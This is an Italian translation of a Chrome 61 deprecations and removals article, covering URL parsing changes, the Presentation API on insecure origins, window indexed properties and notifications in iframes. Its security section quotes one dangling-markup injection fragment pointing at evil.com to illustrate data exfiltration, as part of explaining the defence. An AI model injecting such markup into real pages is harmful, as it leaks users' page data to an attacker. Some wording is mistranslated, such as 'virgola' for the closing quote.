In quasi tutte le versioni di Chrome, vediamo un numero significativo di aggiornamenti e miglioramenti al prodotto, al suo rendimento e anche alle funzionalità della piattaforma web. Questo articolo descrive le ritirazioni e le rimozioni in Chrome 61, che è in versione beta dal 3 agosto. Questo elenco è soggetto a modifiche in qualsiasi momento.
Sicurezza e privacy
Bloccare le risorse i cui URL contengono i caratteri "\n" e "<"
Esiste un tipo di attacco chiamato iniezione di markup inutilizzato in cui viene utilizzato un URL troncato per inviare dati a un endpoint esterno. Ad esempio,
considera una pagina contenente <img src='https://evil.com/?. Poiché l'URL non ha virgolette di chiusura, i browser leggeranno fino alla virgola di chiusura successiva e tratteranno i caratteri racchiusi come se fossero un singolo URL.
Chrome 61 riduce questa vulnerabilità limitando gli alfabeti
consentiti negli attributi href e src. In particolare, Chrome interrompe l'elaborazione degli URL quando incontra caratteri di a capo (\n) e caratteri minori (<).
Gli sviluppatori con un caso d'uso legittimo per i caratteri di a capo e minore in un URL devono invece eseguire la fuga di questi caratteri.
Intento di rimozione | Tracker di Chromestatus | Bug di Chromium
Ritiro e rimozione dell'API Presentation in contesti non sicuri
È stato rilevato che l'API Presentation può essere utilizzata come vettore di pirateria informatica su origini non sicure. Poiché i display non hanno barre degli indirizzi, l'API può essere utilizzata per falsificare i contenuti. È anche possibile esfiltrare i dati dalla presentazione in esecuzione.
In linea con l'intenzione di Blink di rimuovere funzionalità efficaci da origini non sicure, prevediamo di ritirare e rimuovere il supporto dell'API Presentation in contesti non sicuri. A partire da Chrome 61, PresentationRequest.start() non funzionerà più su origini non sicure.
Intento di rimozione | Tracker di Chromestatus | Bug di Chromium
JavaScript
Non consentire la definizione di proprietà indicizzate nelle finestre
In precedenza, alcuni browser consentivano assegnazioni di JavaScript come le seguenti:
window[0] = 1;
Le note sulle specifiche HTML attuali indicano che si tratta di una violazione esplicita della specifica JavaScript. Pertanto, questa funzionalità è stata rimossa in Chrome 61. Da febbraio 2016, Firefox è già conforme.
Rimuovere l'utilizzo delle notifiche da iframe non sicuri
Le richieste di autorizzazione provenienti da iframe possono confondere gli utenti, poiché è difficile distinguere tra l'origine della pagina contenente e l'origine dell'iframe che effettua la richiesta. Quando l'ambito delle richieste non è chiaro, è difficile per gli utenti giudicare se concedere o negare l'autorizzazione.
La disattivazione delle notifiche negli iframe allineerà inoltre i requisiti per l'autorizzazione di notifica a quelli delle notifiche push, semplificando le operazioni per gli sviluppatori.
Gli sviluppatori che hanno bisogno di questa funzionalità possono aprire una nuova finestra per richiedere l'autorizzazione di notifica.
Intento di rimozione | Tracker di Chromestatus | Bug di Chromium